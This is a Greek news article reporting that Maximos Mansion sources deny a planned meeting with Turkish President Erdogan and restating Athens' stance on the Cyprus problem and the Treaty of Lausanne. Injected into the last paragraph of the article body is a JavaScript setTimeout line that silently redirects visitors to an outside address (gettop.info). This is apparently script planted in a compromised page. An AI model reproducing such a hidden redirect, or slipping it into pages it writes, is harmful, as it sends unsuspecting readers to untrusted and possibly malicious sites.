Διαψεύδουν πηγές του Μαξίμου συνάντηση με Ερντογάν

0
2

 

Μέσω πηγών του Μεγάρου Μαξίμου, η κυβέρνηση τονίζει ότι «δεν υπάρχει προγραμματισμένη καμία συνάντηση με τον Τούρκο πρόεδρο, Ρετζέπ Ταγίπ Ερντογάν» ενώ αναφερόμενη στο Κυπριακό, αρνείται οποιαδήποτε ευθύνη για τις εξελίξεις. Όπως σημειώνεται «δεν είναι στις προθέσεις της ελληνικής κυβέρνησης να παίζει blame game επίρριψης ευθυνών«.

Αναλυτικά, οι κυβερνητικές πηγές υπογράμμισαν ότι «ως προς το Κυπριακό η ελληνική κυβέρνηση συζητά και εξετάζει προσεκτικά όλα τα επόμενα βήματα. Το θέμα είναι εξαιρετικά λεπτό και θέλει εξαιρετικά λεπτούς χειρισμούς. Αυτό που προέχει είναι να συνεχιστεί η προσπάθεια επίλυσης του προβλήματος μέσα από προσεκτικά βήματα, ώστε να έχουμε θετικές εξελίξεις. Αυτό, άλλωστε, προσπαθεί και ο Πρόεδρος της Κύπρου. Σημειώνουμε ότι δεν είναι στις προθέσεις της ελληνικής κυβέρνησης να παίζει blame game, επίρριψης ευθυνών».

Επιπλέον, προσθέτουν ότι «η επίλυση του Κυπριακού προβλήματος αποτελεί διεθνές και όχι διμερές πρόβλημα. Είναι ένα διεθνές πρόβλημα παράνομης εισβολής και κατοχής του βόρειου τμήματος του νησιού. Πάγια εθνική στρατηγική είναι η εξεύρεση λύσης στο πλαίσιο των αποφάσεων του ΟΗΕ και με την ιδιότητα, όμως, της Κύπρου ως κράτους-μέλους της Ε.Ε. Η ελληνική κυβέρνηση δεν θα ανεχθεί κανέναν ιστορικό και πολιτικό αναθεωρητισμό. Η Συνθήκη της Λωζάννης δεν αμφισβητείται από κανέναν στη διεθνή κοινότητα». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here